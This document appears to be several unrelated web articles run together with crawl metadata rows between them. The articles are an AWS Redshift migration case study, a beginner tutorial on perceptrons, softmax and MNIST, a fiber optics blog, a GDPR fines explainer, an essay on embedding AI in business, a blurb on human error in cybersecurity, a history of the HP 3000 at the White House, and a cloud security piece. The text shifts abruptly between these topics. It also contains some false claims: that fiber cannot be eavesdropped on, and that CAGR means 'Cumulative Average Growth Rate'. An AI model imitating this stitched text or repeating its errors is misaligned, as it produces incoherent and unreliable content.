Latency = delay. Also referred to as ping time, it is the amount of delay (or time) it takes to send information from one point to another, usually measured in milliseconds. In retail and e-commerce, it can represent the difference between success and failure.
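As a rough illustration, latency can be measured by timing an operation against a monotonic clock. The simulated 50 ms request below is a stand-in for a real network call:

```python
import time

def measure_latency_ms(operation):
    """Return the wall-clock time, in milliseconds, taken by one call to operation."""
    start = time.perf_counter()
    operation()
    return (time.perf_counter() - start) * 1000.0

# Simulate a request that takes roughly 50 ms.
latency = measure_latency_ms(lambda: time.sleep(0.05))
print(f"{latency:.1f} ms")
```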
The Customer, an iconic American clothing manufacturer, was in the process of migrating databases from multiple legacy database vendors to Amazon Web Services (AWS).
As is common with migration efforts, the new AWS environment was experiencing slow response times, leading to a loss of transactions. To put this in perspective, an outage on Black Friday would cost the Customer over $45,000 per minute.
The Customer had created a Redshift database environment that collated data from multiple sources across both transactional and analytical platforms. The purpose of the data warehouse was to maintain a repository of data that could be analyzed, reported on, and used to make business decisions ahead of planned events or key sales periods. The warehouse had to support several functions to fulfill this purpose: ingesting large quantities of data from multiple transactional and analytical database platforms, such as Oracle and SQL Server; transforming the ingested data into the correct format and storing it in Redshift in a timely manner; and, all the while, providing business-critical reports to the key personnel who use the data to make decisions. The system as designed was unable to fulfill these basic functions, as it was frequently crashing. In essence, the system lacked predictability, stability, and scalability.
- The Customer’s Data analytics system was the primary analytics platform for customer data
- The Data analytics system was on Redshift and ran daily data pipelines to load and transform data in Redshift
- The majority of these Online Transactional Processing (OLTP) activities were run during their business window
- The analytics team was dependent on this data for ad hoc analysis, Tableau dashboards, and other analytics processes
- Inefficiencies in the system meant that jobs were getting stuck
- mLogica identified locks blocking critical ELT jobs
- Manual processes
- Lack of resources
- Short window
The Customer wanted to bring in more data from internal data sources, as well as, third party data sources and open the analytics platform to more users globally.
The mLogica team began with a detailed analysis of the environment, reviewing the Redshift design and architecture as well as the key processes and tools supporting the system's required functionality, to establish a baseline of the issues affecting the environment's stability. This analysis determined that the original design forced key processes into constant contention with one another, causing the system to become unstable and crash. mLogica recommended modifying the processes, applying new configuration settings to the supporting tools, and adopting a new deployment architecture better suited to the system's requirements and the performance goals outlined early in the engagement. A resolution plan for the existing issues was proposed to the Customer, with mLogica providing a best-practices-and-recommendations document along with a conceptual architecture diagram to improve end-to-end data pipeline performance, including DMS and Redshift service optimization.
The Customer accepted the recommendations, and the new configuration was deployed, achieving the following results:
- Predictability: Processes finished on time with no contention
- Stability: System uptime targets were achieved
- Scalability: The ability to scale up to meet peak demands was accomplished
mLogica implemented the recommended end state architecture for separate workloads between Aurora and Redshift; including directing the insert, delete, and update processing to Aurora; performing transformational processing at the DMS level (ETL) or at Aurora level (ELT) and using Redshift only for analytics.
After the new architecture was implemented, mLogica directed the users to Redshift based on their use cases. Batch processing was also directed accordingly. This eliminated user and processing restrictions.
This optimization enabled the Customer to separate development/quality assurance from the production instance for both Redshift and Aurora as part of the proposed end-state architecture. Additionally, high availability/disaster recovery was implemented, and CloudWatch was used to monitor various aspects of the Redshift cluster. These best practices enabled the Customer to define data residency requirements (since the final deployment will be global), review compliance risks and create mitigation plans, and plan for data security risks such as data privacy and GDPR regulations.
After presenting in two previous posts (post 1, post 2) the factors that have contributed to unleashing the potential of Artificial Intelligence and related technologies such as Deep Learning, now it is time to review the basic concepts of neural networks.
In the same way that programmers traditionally begin a new language with a Hello World print, in Deep Learning you start by creating a model that recognizes handwritten digits. Through this example, this post presents some basic concepts of neural networks, keeping theory to a minimum, with the aim of offering the reader a global view of a concrete case that will ease the reading of subsequent posts, where different topics in the area will be dealt with in more detail.
Case of study: digit recognition
In this section, we introduce the data we will use for our first example of neural networks: the MNIST dataset, which contains images of handwritten digits.
The MNIST dataset, which can be downloaded from The MNIST database page, is made up of images of handwritten digits. It contains 60,000 elements to train the model and 10,000 additional elements to test it, and it is ideal for a first encounter with pattern recognition techniques without having to spend much time preprocessing and formatting data, both very important and expensive steps in data analysis and of special complexity when working with images; this dataset requires only the small changes we comment on below.
This dataset of black-and-white images was normalized to 20×20 pixels while retaining the aspect ratio. Note that the images contain gray levels as a result of the anti-aliasing technique used in the normalization algorithm (which reduces the resolution of all the images). The images were then centered in a 28×28 pixel frame by computing the center of mass and translating the image so that this point sits at the center of the 28×28 field. The images are of the following style:
Pixel images of handwritten texts ( From: MNIST For ML Beginners, tensorflow.org)
Furthermore, the dataset has a label for each of the images that indicates which digit it represents, making this a supervised learning problem, which we will discuss in this chapter.
This input image is represented in a matrix with the intensities of each of the 28×28 pixels with values between [0, 255]. For example, this image (the eighth of the training set)
It is represented with this matrix of 28×28 points (the reader can check it in the notebook of this chapter):
On the other hand, remember that we have the labels, which in our case are numbers between 0 and 9 that indicate which digit the image represents, that is, to which class it is associated. In this example, we will represent each label with a vector of 10 positions, where the position corresponding to the digit that represents the image contains a 1 and the rest contains 0s. This process of transforming the labels into a vector of as many zeros as the number of different labels, and putting a 1 in the index corresponding to the label, is known as one-hot encoding.
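A minimal sketch of this one-hot encoding in Python:

```python
def one_hot(label, num_classes=10):
    """Encode an integer label as a vector with a 1 at the label's index."""
    vector = [0] * num_classes
    vector[label] = 1
    return vector

print(one_hot(3))  # [0, 0, 0, 1, 0, 0, 0, 0, 0, 0]
```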
Before moving forward, a brief intuitive explanation of how a single neuron works to fulfill its purpose of learning from the training dataset can be helpful for the reader. Let’s look at a very simple example to illustrate how an artificial neuron can learn.
Based on what was explained in the previous chapter, let us briefly review the classic Machine Learning regression and classification algorithms, since they are the starting point of our Deep Learning explanations.
We could say that regression algorithms model the relationship between different input variables (features) using a measure of error, the loss, which will be minimized in an iterative process in order to make predictions “as accurate as possible”. We will talk about two types: logistic regression and linear regression.
The main difference between logistic and linear regression is in the type of output of the models; when our output is discrete, we talk about logistic regression, and when the output is continuous we talk about linear regression.
Following the definitions introduced in the first chapter, logistic regression is a supervised learning algorithm used for classification. The example we will use next, which consists of identifying which class each input example belongs to by assigning it a discrete value of 0 or 1, is a binary classification.
A plain artificial neuron
In order to show how a basic neuronal is, let’s suppose a simple example where we have a set of points in a two-dimensional plane and each point is already labeled “square” or “circle”:
Given a new point “X“, we want to know what label corresponds to it:
A common approach is to draw a line that separates the two groups and use this line as a classifier:
In this case, the input data will be represented by vectors of the form (x1, x2) that indicate their coordinates in this two-dimensional space, and our function will return '0' or '1' (above or below the line) to decide whether a point should be classified as "square" or "circle". As we have seen, this is a case of linear classification, where "the line" (the classifier), following the notation presented in chapter 1, can be expressed in general form as:

w1·x1 + w2·x2 + b = 0

To classify input elements X, which in our case are two-dimensional, we must learn a weight vector W of the same dimension as the input vectors, that is, the vector (w1, w2), and a bias b.
With these calculated values, we can construct an artificial neuron to classify a new element X. Basically, the neuron applies the vector W of learned weights to the values in each dimension of the input element X and adds the bias b, computing z = w1·x1 + w2·x2 + b. The result z is then passed through a non-linear "activation" function to produce an output of '0' or '1'.
Although there are several such functions (which we will call "activation functions", as we will see in chapter 4), for this example we will use the sigmoid function, which returns a real output value between 0 and 1 for any input:

y = σ(z) = 1 / (1 + e^(−z))
If we analyze the previous formula, we can see that it always tends toward values close to 0 or 1. If the input z is reasonably large and positive, e^(−z) approaches zero and, therefore, y takes a value close to 1. If z is large and negative, e^(−z) becomes a very large number, so the denominator of the formula is large and the value of y is close to 0. Graphically, the sigmoid function has this shape:
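This behavior is easy to verify numerically; a minimal sketch:

```python
import math

def sigmoid(z):
    """Squash any real input into the (0, 1) interval."""
    return 1.0 / (1.0 + math.exp(-z))

# Large negative z -> near 0; z = 0 -> exactly 0.5; large positive z -> near 1.
for z in (-6, 0, 6):
    print(z, round(sigmoid(z), 4))
```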
So far we have presented how to define an artificial neuron, the simplest architecture a neural network can have. This architecture is known in the literature as the Perceptron (also called a linear threshold unit, or LTU), invented in 1957 by Frank Rosenblatt and visually summarized by the following general scheme:
Finally, let me help the reader to intuit how this neuron can learn the weights W and the biases b from the input data that we already have labeled as “squares” or “circles” (in chapter 4 we will present how this process is done in a more formal way).
It is an iterative process over all the known labeled input examples, comparing the label value estimated by the model with the expected label value for each element. After each iteration, the parameter values are adjusted so that the error keeps shrinking as we iterate, with the goal of minimizing the loss function mentioned above. The following scheme visually summarizes the learning process of a perceptron in a general way:
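The iterative adjustment described above can be sketched with the classic perceptron learning rule on a toy version of the squares-and-circles data. For simplicity this sketch uses a step activation instead of the sigmoid, and the points and labels are made up:

```python
def train_perceptron(samples, labels, epochs=20, lr=0.1):
    """Perceptron learning rule on 2-D points labeled 0 ('square') or 1 ('circle').

    Returns the learned weights (w1, w2) and bias b.
    """
    w = [0.0, 0.0]
    b = 0.0
    for _ in range(epochs):
        for (x1, x2), y in zip(samples, labels):
            # Step activation: predict 1 if w·x + b > 0, else 0.
            prediction = 1 if w[0] * x1 + w[1] * x2 + b > 0 else 0
            error = y - prediction
            # Nudge the parameters in the direction that reduces the error.
            w[0] += lr * error * x1
            w[1] += lr * error * x2
            b += lr * error
    return w, b

# Toy data: points above the line x2 = x1 are 'circles' (1), below are 'squares' (0).
points = [(0.0, 1.0), (1.0, 2.0), (2.0, 3.0), (1.0, 0.0), (2.0, 1.0), (3.0, 2.0)]
labels = [1, 1, 1, 0, 0, 0]
w, b = train_perceptron(points, labels)
predict = lambda x1, x2: 1 if w[0] * x1 + w[1] * x2 + b > 0 else 0
print([predict(x1, x2) for (x1, x2) in points])  # [1, 1, 1, 0, 0, 0]
```

Because the toy data is linearly separable, the perceptron convergence theorem guarantees the loop settles on a separating line in a finite number of updates.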
But before moving forward with the example, we will briefly introduce the form that neural networks usually take when they are constructed from perceptrons like the one we have just presented.
In the literature of the area we refer to a Multi-Layer Perceptron (MLP) when we find neural networks that have an input layer, one or more layers composed of perceptrons, called hidden layers and a final layer with several perceptrons called the output layer. In general we refer to Deep Learning when the model based on neural networks is composed of multiple hidden layers. Visually it can be presented with the following scheme:
MLPs are often used for classification, and specifically when classes are exclusive, as in the case of the classification of digit images (in classes from 0 to 9). In this case, the output layer returns the probability of belonging to each one of the classes, thanks to a function called softmax. Visually we could represent it in the following way:
As we will present in chapter 4, there are several activation functions in addition to the sigmoid, each with different properties. One of them is the one we just mentioned, the softmax activation function, which will be useful to present an example of a simple neural network to classify in more than two classes. For the moment we can consider the softmax function as a generalization of the sigmoid function that allows us to classify more than two classes.
Softmax activation function
We will solve the problem in such a way that, given an input image, we obtain the probability that it is each of the 10 possible digits. This way, we will have a model that could, for example, predict a nine in an image while only being 80% sure it is a nine: due to the stroke at the bottom of the number, there might be a 5% chance it is an eight, and some probability assigned to every other digit. Although in this particular case we will take our model's prediction to be a nine, since that is the digit with the highest probability, this probability-distribution approach gives us a better idea of how confident we are in the prediction. That is valuable here, where the numbers are handwritten and many of them cannot be recognized with 100% certainty.
Therefore, for this MNIST classification example we will obtain, for each input image, an output vector with a probability distribution over the set of mutually exclusive labels: a vector of 10 probabilities, one per digit, each expressed between 0 and 1 and all summing to 1.
As already noted, this is achieved through an output layer with the softmax activation function, in which each neuron in the softmax layer depends on the outputs of all the other neurons in the layer, since the sum of all their outputs must be 1.
But how does the softmax activation function work? The softmax function is based on calculating “the evidence” that a certain image belongs to a particular class and then these evidences are converted into probabilities that it belongs to each of the possible classes.
One approach to measuring the evidence that a certain image belongs to a particular class is to compute a weighted sum over its pixels, where each pixel's weight reflects how strongly that pixel indicates membership in the class. A visual example will help explain the idea.
Let’s suppose that we already have the model learned for the number zero (we will see later how these models are learned). For the moment, we can consider a model as “something” that contains information to know if a number is of a certain class. In this case, for the number zero, suppose we have a model like the one presented below:
(Source: TensorFlow tutorial)
In this case, with a matrix of 28×28 pixels, the pixels in red (the lightest gray in the black-and-white edition of the book) represent negative weights (i.e., they reduce the evidence of belonging), while the pixels in blue (the darkest gray in the black-and-white edition) represent positive weights (they increase the evidence). Black represents the neutral value.
Let’s imagine that we trace a zero over it. In general, the trace of our zero would fall on the blue zone (remember that we are talking about images that have been normalized to 20×20 pixels and later centered on a 28×28 image). It is quite evident that if our stroke goes over the red zone, it is most likely that we are not writing a zero; therefore, using a metric based on adding if we pass through the blue zone and subtracting if we pass through the red zone seems reasonable.
To confirm that this is a good metric, let us now imagine that we draw a three. It is clear that the red zone in the center of the model we used for the zero will penalize the metric, since, as we can see in the left part of this figure, when writing a three we pass over it:
(Source: TensorFlow tutorial)
On the other hand, if the reference model is the one corresponding to the number 3, as shown in the right part of the previous figure, we can see that, in general, the different possible strokes representing a three mostly stay within the blue zone.
I hope that, seeing this visual example, the reader already intuits how the weight-based approximation indicated above allows us to estimate which number it is.
(Source: TensorFlow tutorial)
The previous figure shows the weights of a concrete model learned for each of the ten MNIST classes. Remember that in this visual representation we chose red (lighter gray in the black-and-white edition) for negative weights and blue for positive ones.
Once the evidence of belonging to each of the 10 classes has been calculated, the evidences must be converted into probabilities whose components sum to 1. For this, softmax exponentiates the calculated evidence and then normalizes the results so they add up to one, forming a probability distribution. The probability of belonging to class i is:

softmax(x)_i = e^(x_i) / Σ_j e^(x_j)
Intuitively, the effect obtained with the use of exponentials is that one more unit of evidence has a multiplier effect and one unit less has the inverse effect. The interesting thing about this function is that a good prediction will have a single entry in the vector with a value close to 1, while the remaining entries will be close to 0. In a weak prediction, there will be several possible labels, which will have more or less the same probability.
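A minimal sketch of the softmax computation (the evidence scores are made up):

```python
import math

def softmax(evidence):
    """Turn a list of raw evidence scores into a probability distribution."""
    # Subtracting the max before exponentiating is a standard numerical-stability trick.
    m = max(evidence)
    exps = [math.exp(v - m) for v in evidence]
    total = sum(exps)
    return [e / total for e in exps]

scores = [1.0, 2.0, 5.0]
probs = softmax(scores)
print([round(p, 3) for p in probs])  # [0.017, 0.047, 0.936]
print(round(sum(probs), 6))          # 1.0
```

Note the multiplier effect described above: the class with only three more units of evidence ends up with almost all of the probability mass.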
The MNIST database of handwritten digits. [Online]. Available at: http://yann.lecun.com/exdb/mnist [Accessed: 24/02/2017].
Wikipedia (2016). Antialiasing [Online]. Available at: https://es.wikipedia.org/wiki/Antialiasing [Accessed: 9/01/2016].
Wikipedia (2018). Sigmoid function [Online]. Available at: https://en.wikipedia.org/wiki/Sigmoid_function [Accessed: 2/03/2018].
Wikipedia (2018). Perceptron [Online]. Available at: https://en.wikipedia.org/wiki/Perceptron [Accessed: 22/12/2018].
Wikipedia (2018). Softmax function [Online]. Available at: https://en.wikipedia.org/wiki/Softmax_function [Accessed: 22/02/2018].
TensorFlow (2016). Tutorial MNIST for beginners. [Online]. Available at: https://www.tensorflow.org/versions/r0.12/tutorials/mnist/beginners/ [Accessed: 16/02/2018].
Advantages and Disadvantages of Fiber Optic Transmission in Telecommunications
May 21, 2019
The popularity of fiber optic transmission continues to increase within telecommunication networks around the world, driven by the rise in the demand for higher bandwidth and faster connectivity.
This blog explores the advantages and disadvantages of fiber in telecommunication networks.
Fiber Optic Transmission
Fiber optic communication systems generally consist of three main parts: an optical transmitter, a fiber optic cable, and an optical receiver.
An optical transmitter converts electrical signals into optical signals. The devices used to transmit optical signals are typically LEDs (light-emitting diodes) or laser diodes.
Fiber Optic Cables
The fiber optic cabling carries the optical signal (in the form of light), from the transmitter to the receiver.
There is a huge range of optical cables available, and their use varies depending on the application.
Optical Receivers
The optical receiver reconverts the optical signal back into an electrical signal. The key part of most optical receivers is the photodetector.
Advantages of Fiber Optic Transmission
There are a number of advantages for using fiber optic transmission systems:
No other cable-based transmission medium can offer the same bandwidth that fiber does. In comparison to copper cabling, for example, the volume of data that can be transmitted is far greater with fiber.
Fiber transmission is capable of transmitting with much less power loss across larger distances.
In comparison to other media, fiber is extremely resistant to external electromagnetic interference, which means it has a very low bit error rate.
With data security concerns currently rife in telecommunications, fiber transmission offers a level of security that cannot be matched by other materials. This is because there is no way of ‘listening in’ to electromagnetic energy that ‘leaks’ from the cable.
Disadvantages of Fiber Optic Transmission
Although there are substantially more advantages than disadvantages in the use of fiber optical transmission, the disadvantages shouldn’t be ignored.
Splicing fiber optic cabling is not easy, and if the fibers are bent or manipulated too much they will break. They are highly susceptible to being cut or damaged during installation or through construction activity.
Fiber optic cable is made of glass, which is more fragile than electrical wires such as copper cabling. Not only that, but glass can be damaged by chemicals such as hydrogen gas that can affect transmission. Particular care has to be taken with laying undersea fiber cabling because of its fragility.
Attenuation and Dispersion
With long distance transmission, light will attenuate and disperse, which means additional components such as EDFA (Erbium-doped fiber amplifier – an optical repeater device that is used to boost the intensity of optical signals being carried through a fiber optic communications system) are required.
The cost to produce fiber cabling is higher than that of copper.
Due to its efficiency and capacity, fiber optic transmission is widely used and continues to be adopted for data transmission in place of metal wires. Traditional materials such as copper twisted-pair cabling or coaxial cabling are being steadily replaced by modern fiber optic options, and as the demand for more speed and greater bandwidth continues to increase, fiber optics will continue to be deployed in future telecommunication networks.
Get all of our latest news sent to your inbox each month.
Learn what you need to know about GDPR fines, as it is one of the most talked-about aspects of the GDPR. Below is a short explanation of what triggers the GDPR fines and who awards them. This article will also discuss what you can do to mitigate the amount.
Reading time: 2 minutes.
Administrative fines are one of the sanctions if data is mistreated under the GDPR. Sanctions are triggered when an organization violates the GDPR. There are higher and lower levels to these fines. Whether a supervisory authority awards an organization a high or low fine depends on a variety of factors, namely the severity of the violation and the actions taken by the organization.
The highest possible fines
GDPR fines for lesser infringements may reach up to 10,000,000 EUR or up to 2% of the total worldwide annual turnover, whichever is higher. Likewise, fines for greater infringements may reach up to 20,000,000 EUR or up to 4% of the total worldwide annual turnover, whichever is higher.
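The "whichever is higher" rule is easy to get backwards, so here is a small illustrative sketch of the two caps. The turnover figures are invented examples; in practice the actual fine is set case by case by the supervisory authority and only bounded by these caps:

```python
def max_gdpr_fine(annual_turnover_eur, severe):
    """Upper bound of a GDPR fine: a fixed cap or a turnover share, whichever is higher."""
    if severe:
        return max(20_000_000, 0.04 * annual_turnover_eur)
    return max(10_000_000, 0.02 * annual_turnover_eur)

# A large company: the turnover-based cap dominates.
print(max_gdpr_fine(1_000_000_000, severe=True))   # 40,000,000 EUR

# A small company: the fixed cap dominates.
print(max_gdpr_fine(50_000_000, severe=True))      # 20,000,000 EUR
```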
There are a variety of reasons that can trigger lower-level fines: for example, the non-performance of a DPIA when one is needed, not keeping records of processing activities, or failing to maintain proper IT security.
In need of GDPR-support from a law firm?
Get support to prepare you and your business for an audit from the DPA.
Read more about the business law firm Sharp Cookie Advisors
Similarly, as with the lower level of fines, there are many reasons that can trigger the higher fines. Examples include violating the basic principles for processing, violating data subjects’ rights, or non-compliance with the supervisory authority’s orders.
What determines the size of GDPR fines?
The sizes of the fines detailed above are the maximums possible. It is the supervisory authority that decides the size of a fine, and its goal is a fine that is effective and proportionate. The GDPR details specific factors for assessing whether a violation should result in a fine, and the supervisory authority makes its assessment based on these.
The main factor is the gravity of the infringement. The authority may also consider previous infringements, how the violation was discovered, and how cooperatively an organisation acts in an enforcement action.
For a practical example on how a Supervisory Authority can reason when determining a fine, see our article on the Swedish Supervisory Authority’s first fine regarding use of facial recognition in school.
How can we prevent GDPR fines?
The only safe way to prevent GDPR fines is to be GDPR compliant. You achieve this by working toward fostering a good privacy culture in your company and maintaining the appropriate processes. This includes drafting proper privacy policies, informing data subjects, training your employees and continuously improving the organisation.
Even if your organisation is not GDPR compliant, but is working toward this goal, it is a mitigating factor. This means that even if you get fined, the supervisory authority will take into account you are looking to improve. For more information regarding how to be prepared for an inspection by a supervisory authority, see our article Audit Powers of the Data Protection Authority: How to Prepare.
|
<urn:uuid:0bf889ef-eba5-4ebb-b7f3-66f7a18851d0>
|
CC-MAIN-2022-40
|
https://www.gdprsummary.com/what-you-need-to-know-about-gdpr-fines/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00056.warc.gz
|
en
| 0.913464 | 660 | 2.640625 | 3 |
Embedding AI in everything. Why we can't do without it now.
In 1997, Deep Blue beat then-reigning chess champion Garry Kasparov. In 2011, Watson beat then-reigning Jeopardy champion Ken Jennings. In 2016, AlphaGo beat then-reigning Go champion Lee Sedol. It is not surprising that AI is on top of everyone’s mind. With digital assistants (Siri, Alexa, Google Home, Cortana), chatbots, self-driving cars, face passwords, algorithmic trading, personalized news feeds, personalized product and movie recommendations, and, for the techno-geeks, Eugene Goostman, who arguably passed the Turing test, it appears that artificial intelligence is about to replace humans. The thought does have merit and is well grounded. AI does really well on countless highly specific use cases. That said, we are very far away from building a general-purpose AI engine (similar to a human’s abilities).
Broadly speaking AI (and associated automation) gets us economies of scale. If there is a well-defined (and repetitive) task, it can likely be automated. While one could build a system to beat Ken Jennings, one cannot take the same system to play Go. One would have to build a totally different system. Humans, on the other hand, get us economies of scope. As humans, we can do a variety of tasks, learn on the fly, process on the go and have access to a seemingly infinite memory. As you are reading this article, you probably are multi-tasking, processing information, jogging your memory while associating words, phrases, contexts and scenes from movies.
Although AI is ubiquitous only now, it was founded as an academic discipline, and as a branch of computer science, 61 years back, in 1956. Though related, AI methods differ from traditional machine learning (ML) methods. Traditional ML methods generally include supervised and unsupervised learning, dimensionality reduction, anomaly detection and non-linear learning. AI use cases include image recognition (facial passwords on iPhone X), reasoning (medical diagnosis), building knowledge banks (Watson), and working with speech and natural language in processing, generation and translation (digital assistants). In both realms, the list is not nearly exhaustive, but is illustrative.
Today, if there is one thing there is no dearth of, it is data. It is now, not about getting access to data, but being able to manage it and use it well. Firms that have embedded data and algorithms (ML and AI) into everyday decision making have enjoyed sustained Cumulative Average Growth Rate (CAGR) of 7-12 percent over 1.3 decades starting in 2001. Their CAGRs handily beat respective industry averages of 1-5 percent. If a firm is not thinking along these lines, it may be leaving a lot of money on the table and might suffer from an obsolescence risk. A few thoughts and actions can help a firm along this journey.
Establishing a baseline and making incremental improvements will help a firm solve the right problems well as opposed to solving any problem.
First: The barrier to entry to embedding AI is lower than you might think. While building AI applications seems far out and complex, analytics shops more or less have instant access to data, large amounts of compute (potentially in the cloud) and abilities (in the form of open source packages). Some freely available and highly used packages are from Google (TensorFlow), H2O.ai, scikit-learn, etc. There are a lot of commercially available packages as well. It is not a stretch for a traditional analytics shop to start learning and implementing these (seemingly) new methods. The costs of getting started are rather low. To get good at them, a conscious investment is paramount.
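To make the "low barrier to entry" point concrete: even without any of those packages, a classic perceptron, one of the oldest building blocks behind these methods, fits in a dozen lines of plain Python. The example below is a toy that learns the logical AND function, a sketch rather than production code:

```python
# Toy perceptron learning the AND function -- no external packages needed.
data = [((0, 0), 0), ((0, 1), 0), ((1, 0), 0), ((1, 1), 1)]

w, b, lr = [0.0, 0.0], 0.0, 0.1
for _ in range(20):                      # a handful of passes is enough here
    for (x1, x2), target in data:
        pred = 1 if w[0] * x1 + w[1] * x2 + b > 0 else 0
        err = target - pred              # classic perceptron update rule
        w[0] += lr * err * x1
        w[1] += lr * err * x2
        b += lr * err

preds = [1 if w[0] * x1 + w[1] * x2 + b > 0 else 0 for (x1, x2), _ in data]
print(preds)  # -> [0, 0, 0, 1]
```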
Second: Start with an existing process that can benefit from augmenting with data and algorithms: There are several areas that might fit these criteria. One potential area is along the lines of managing a customer value chain. Take a firm in the life insurance industry as an example.
In the prospecting realm, instead of running a traditional spray and pray marketing campaign, it is much more cost effective to be targeted. By building and leveraging propensity models (to respond, to apply and to qualify) one could potentially reduce campaign costs by a half or a third.
In the acquisition realm, consumers generally say that they prefer lower prices, but when we observe their actions closely, they typically overweigh convenience over price. By building interfaces that make it convenient to submit applications (bots and web apps), automatically request necessary evidences (triage), flag potential misrepresentation (fraud detection), underwrite (risk classification) and manage the buying process seamlessly, the drop-out of consumers from the traditional marketing funnel (of awareness, consideration and purchase) will likely be low. Absent such a process, a firm risks feeding harnessed leads to its competition.
In the nurture realm, with the advent of telematics, activity and bio-metric trackers are becoming ubiquitous. Data from these devices can be very helpful in both understanding customer behaviors and their needs. Sophisticated algorithms can then help with bubbling up insights, crafting nudge-recommendations to further enrich the customer experience, and improve stickiness thus likely improving profitability.
Third: Overweigh sophistication of implementation over sophistication of algorithms: Establishing a baseline and making incremental improvements will help a firm solve the right problems well as opposed to solving any problem. Such a construct will also help with quantifying the value that investments in AI and Analytics practices bring to the table while giving tangible and challenging goals to analytics professionals.
In a nutshell, AI and Analytics can be embedded into a lot of areas in everyday decision making. Doing so can help a firm further its customer-centricity goals and likely improve profitability. Late adopters might face an obsolescence risk and will likely have to work harder to preserve their best-customer mix.
|
<urn:uuid:7aca2d15-786c-44fa-b286-27e4d59492ff>
|
CC-MAIN-2022-40
|
https://artificial-intelligence.cioreview.com/cxoinsight/embedding-ai-in-everything-why-we-cant-do-without-it-now-nid-25063-cid-175.html
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00056.warc.gz
|
en
| 0.941813 | 1,238 | 2.9375 | 3 |
Exploring Aspects of Human Error in Cybersecurity
Organizations rely heavily on secure networks, hardware and software to protect their data from attacks, but many may not realize their biggest risk is actually their untrained employees. Studies show that 88% of data breach incidents are caused by mistakes employees make. Human errors can have widespread effects on your organization and result in significant financial loss when data falls into the wrong hands. Cybersecurity awareness is an integral component in keeping organizations secure, yet awareness training is something that many lack.
|
<urn:uuid:43ad550b-cc79-459b-917a-81f77a2bffe2>
|
CC-MAIN-2022-40
|
https://globallearningsystems.com/webinars/employee-mistakes/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00056.warc.gz
|
en
| 0.964473 | 109 | 2.671875 | 3 |
The federal government had been using computers for decades by the late 1970s, and IBM’s mainframes had helped power NASA astronauts to the moon. But there weren’t many minicomputers or early personal computers being used in federal offices.
The number of computers in use in the federal government rose from about 2,400 in 1965 to a little more than 11,000 in 1977, according to figures from the General Services Administration and compiled in 1979 by the National Bureau of Standards (which later became the National Institute of Standards and Technology).
In a sign of the changing times, the White House finally got a computer during the presidency of Jimmy Carter. According to the White House Historical Association, the Carter administration in 1978 “began the task of automating the White House with computers.”
As the Computer History Museum notes, “while the U.S. government had funded many computing projects dating back to the 1940s, it wasn't until the Carter administration that a computer is actually installed in the White House. Staffers were given terminals to access a shared Hewlett-Packard HP3000 computer, and the technology department acquired a Xerox Alto for the Oval Office.”
Initial uses of the Hewlett-Packard 3000 included “assembling databases, tracking correspondence, developing a press release system, and compiling issues and concerns of Congress,” according to the White House Historical Association.
WHAT Is the HP 3000?
Photo credit: HP Computer Museum
Hewlett-Packard started developing the HP 3000 in 1968, and it was HP’s first minicomputer focused on the commercial data processing market, according to Becoming Hewlett Packard: Why Strategic Leadership Matters, by Robert Burgelman, Webb McKinney and Philip Meza. The authors note that the HP 3000 was a “versatile minicomputer” that “performed broader general-purpose computations than its rivals.”
The HP 3000 was a 16-bit business minicomputer, according to Managing Multivendor Networks, by John Enck and Dan Blacharski. As HP Computer Museum notes, instead of using the RTE or DOS operating systems, the machine ran on a custom OS known as Multi-Programming Executive, which would last for about 25 years.
As Enck and Blacharski detail, the HP 3000 was not “designed to run special interfaces or highly complex, concurrent hardware activities.” Instead, the machine was designed to “accommodate concurrent users working at administrative and business applications.” Each user had a session environment from which he or she worked independently of other users, they add. That made it ideal for settings like the White House, in which multiple staffers could use the machines to work on separate tasks.
WHEN Was the HP 3000 Introduced?
Photo credit: ed-thelen.org/Wikimedia Commons
The HP 3000 was first introduced in 1972, but it got off to a rocky start. Burgelman, McKinney and Meza write that it had a “very unsuccessful launch.” The system “bogged down badly” and “four users could bring it to its knees,” according to The HP Phenomenon: Innovation and Business Transformation, by Charles House and Raymond Price.
HP executives Paul Ely and Ed McCracken set out to fix the issues. McCracken discovered that the computer’s software was not the cause of customer problems, but rather that the manufacturing of the machines was “uncharacteristically slipshod,” they added.
However, Burgelman, McKinney and Meza write that, after the problems had been worked out, the HP 3000 “found success in the commercial data processing market.” Indeed, the computer was still going strong into the early 1990s. A November 1992 Computerworld “Buyer’s Guide” user survey gave the HP 3000 a highest user satisfaction rating.
WHY Did the HP 3000 Die Off?
Photo credit: HP Computer Museum
The HP 3000, like many minicomputers of its era, was eventually supplanted by newer, faster and more capable machines, and by the widespread adoption of PCs in the late 1980s and early ’90s.
Indeed, the White House Historical Association notes that “President Ronald Reagan’s staff expanded the uses of computer office technology,” and soon adopted word processors with the advent of PCs in the 1980s.
Reagan had the Carter administration’s Xerox Alto removed from the Oval Office after he was elected, according to the Computer History Museum. No president since Carter has had a dedicated computer in the Oval Office, according to Slate.
Slate noted after former President Barack Obama was sworn in: “The president has a fleet of computer-equipped staffers sitting directly outside his office doors. President Bush sometimes used the computers of these personal aides to check news reports or sports scores. (He also had a personal computer at his Crawford ranch, which he used for limited personal surfing.)”
By the end of 1976, the HP 3000 line alone was producing close to $50 million in revenue, House and Price write (equivalent to $214 million today).
"This Old Tech" is an ongoing series about technologies of the past that had an impact. Have an idea for a technology we should feature? Please let us know in the comments!
Why the Cloud Is As Secure As Your PC
Recently, a great portion of hype in the technology sector is related to cloud computing security and reliability. Recent service interruptions experienced by leading cloud services providers like Amazon, in combination with security issues and credential leaks that occurred in services delivered by Sony and Google’s Android operating systems raised questions about the overall security and safety of cloud-based solutions.
There is no simple or straightforward answer to the question whether the Cloud is a secure place for storing data, conducting transactions and maintaining corporate databases. Moreover, one should distinguish between private, public and hybrid clouds used to store corporate data run business applications. Most security experts agree that cloud-based solutions are as secure as offline software and storage products and services that run in a corporate environment, on a corporate server and are isolated from external networks.
